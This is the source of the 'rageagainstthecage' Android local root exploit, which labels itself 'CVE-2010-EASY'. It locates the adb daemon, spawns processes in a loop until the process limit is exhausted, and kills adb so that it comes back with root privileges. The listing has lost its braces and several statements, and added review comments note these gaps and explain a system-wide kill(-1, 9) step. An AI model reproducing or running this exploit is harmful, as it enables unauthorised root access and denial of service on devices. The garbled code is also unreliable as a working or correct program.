rageagainstthecage 源代码

#include <stdio.h> 
#include <sys/types.h> 
#include <sys/time.h> 
#include <sys/resource.h> 
#include <unistd.h> 
#include <fcntl.h> 
#include <errno.h> 
#include <string.h> 
#include <signal.h> 
#include <stdlib.h> 
void die(const char *msg) 


pid_t find_adb() 
/* Scan /proc/<pid>/cmdline for pid 0..31999 and return a pid whose command
 * line contains "/sbin/adb"; returns 0 when no such process is found.
 * Because the loop never breaks on a match, a later matching pid overwrites
 * an earlier one.
 * NOTE(review): this listing has lost its braces, so the exact block
 * structure (what happens when open() fails, the extent of the loop body)
 * cannot be confirmed here; the "//end if" / "//end for" markers are the
 * only hint of the original nesting. */
 
    char buf[256]; 
    int i = 0, fd = 0; 
    pid_t found = 0;    // initialised to 0; stays 0 if adb is never found
    for (i = 0; i < 32000; ++i)  
        // "/proc/%d/cmdline" with i < 32000 is far shorter than buf, so this
        // sprintf cannot overflow
        sprintf(buf, "/proc/%d/cmdline", i); 
        if ((fd = open(buf, O_RDONLY)) < 0) 
          //end if  -- the body that skips an unreadable pid is missing from this listing; TODO confirm
        // memset plus the sizeof(buf) - 1 bound keep buf NUL-terminated for strstr
        memset(buf, 0, sizeof(buf)); 
        // return value unchecked (a short or failed read leaves buf all zeros)
        read(fd, buf, sizeof(buf) - 1); 
        // NOTE(review): no close(fd) is visible in this block, so each opened
        // cmdline file leaks a descriptor until the process exits
        if (strstr(buf, "/sbin/adb"))  
            found = i; 
          //end if 
      //end for 
    return found; 

void restart_adb(pid_t pid) 
/* Send SIGKILL to pid. Despite the name, nothing in this block restarts
 * anything, and the return value of kill() is not checked. This function is
 * not called from the main() visible in this listing. */
 
    // kill the process outright (sig = SIGKILL); the literal 9 is SIGKILL on
    // Linux, and the named constant from <signal.h> would be clearer
    kill(pid, 9); 

void wait_for_root_adb(pid_t old_adb) 
/* Poll find_adb() until it reports a non-zero pid different from old_adb,
 * then send SIGKILL to every process the caller is permitted to signal.
 * NOTE(review): the if that detects the new pid has no body in this listing
 * (presumably a break; was lost), so as written the loop would never exit --
 * the exit condition is inferred, not visible. This function is not called
 * from the main() visible in this listing. */
 
    pid_t p = 0; 
    for (;;)  
        p = find_adb(); 
        if (p != 0 && p != old_adb) 
      //end for  -- the statement that leaves the loop is missing here; TODO confirm
    // kill(-1, 9): pid -1 addresses every process the caller may signal
    // (except init), and 9 is SIGKILL -- a destructive, system-wide step
    // that a reviewer should treat as a red flag
    kill(-1, 9); 

int main(int argc, char **argv) 
/* Entry point. Reads RLIMIT_NPROC, locates the running adb daemon via
 * find_adb(), then fork()s in a loop until fork() fails and reports that
 * over the pepe pipe. Returns 0. argc/argv are unused.
 * NOTE(review): this listing has lost its braces and apparently several
 * statements (no pipe(pepe) call, no exit after the RLIM_INFINITY message,
 * empty bodies after several if/for lines, no increment of pids), so the
 * control flow is only partly recoverable; the comments below describe the
 * visible lines only. */
 
    pid_t adb_pid = 0, p; 
    int pids = 0, new_pids = 1; 
    int pepe[2];   // pipe descriptors; no pipe(pepe) call is visible in this listing -- TODO confirm
    char c = 0;    // one-byte token passed through the pipe
    struct rlimit rl; 
    printf(" CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n"); 
    printf(" checking NPROC limit ...\n"); 
    if (getrlimit(RLIMIT_NPROC, &rl) < 0) 
        die("[-] getrlimit"); 
    // the message says "Exiting", but no exit()/return follows in this
    // listing -- presumably lost
    if (rl.rlim_cur == RLIM_INFINITY)  
        printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n"); 
    // rlim_t is unsigned long on glibc/bionic but not guaranteed to be; a
    // cast to unsigned long would make the %lu conversions portable
    printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max); 
    printf(" Searching for adb ...\n"); 
    adb_pid = find_adb(); 
    if (!adb_pid) 
        die("[-] Cannot find adb"); 
    printf("[+] Found adb as PID %d\n", adb_pid); 
    printf(" Spawning children. Dont type anything and wait for reset!\n"); 
    printf("\n If you like what we are doing you can send us PayPal money to\n" 
           " 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n" 
           " If you are a company and feel like you profit from our work,\n" 
           " we also accept donations > 1000 USD!\n"); 
    printf("\n adb connection will be reset. restart adb server on desktop and re-login.\n"); 
    // the body of this if (the parent branch) is missing from the listing;
    // without braces the next if would be its only statement -- TODO confirm
    if (fork() > 0) 
    if (fork() == 0)  
        // child: fork repeatedly until fork() fails. From a monitoring
        // point of view this is a burst of fork() calls ending in EAGAIN,
        // i.e. process-count exhaustion, which is noisy and easy to detect.
        // pids is printed below but never incremented in the visible lines.
        for (;;)  
            if ((p = fork()) == 0)  
            else if (p < 0)     // fork failed: the process limit has been reached
                if (new_pids)  
                    printf("\n[+] Forked %d childs.\n", pids); 
                    new_pids = 0; 
                    // return value unchecked
                    write(pepe[1], &c, 1); 
    // parent side: block until the forking child reports exhaustion;
    // return value unchecked
    read(pepe[0], &c, 1); 
    // the loop body is empty in this listing; presumably lost
    if (fork() == 0)  
        for (;;) 
    return 0; 
